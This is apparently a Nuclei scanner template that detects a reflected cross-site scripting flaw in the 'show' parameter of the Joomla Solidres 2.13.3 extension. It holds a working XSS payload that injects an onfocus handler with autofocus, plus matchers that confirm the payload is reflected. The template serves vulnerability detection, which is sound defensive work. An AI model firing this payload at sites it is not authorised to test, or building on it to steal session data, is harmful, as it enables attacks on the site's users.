nuclei-templates/http/vulnerabilities/joomla/joomla-solidres-xss.yaml

42 lines
1.3 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: joomla-solidres-xss
info:
name: Joomla Solidres 2.13.3 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Joomla extension for Solidres - Online Booking System & Reservation Software is vulnerable to XSS in GET parameter 'show'.
reference:
- https://www.exploit-db.com/exploits/51638
- https://cxsecurity.com/issue/WLB-2023070080
- https://cyberlegion.io/joomla-solidres-2-13-3-cross-site-scripting/
metadata:
verified: true
max-request: 1
tags: xss,joomla,unauth
http:
- method: GET
path:
- "{{BaseURL}}/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=db8ck%22onfocus=%22confirm(document.domain)%22autofocus=%22xwu0k"
2023-10-17 16:37:11 +00:00
matchers-condition: and
2023-10-17 07:20:28 +00:00
matchers:
2023-10-17 16:37:11 +00:00
- type: word
part: body
words:
- 'onfocus="confirm(document.domain)"autofocus'
- 'com_solidres'
2023-10-17 07:20:28 +00:00
condition: and
2023-10-17 16:37:11 +00:00
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4a0a0047304502207b7244d2ec594834596770fc6f8748e1aa94a3791d7da38a09b63e63e184f601022100aa0d2f3b1ba68220120d135bec48e5d5c3a727623e1b5ea69ef4bff3665e202d:922c64590222798bb761d5b6d8e72950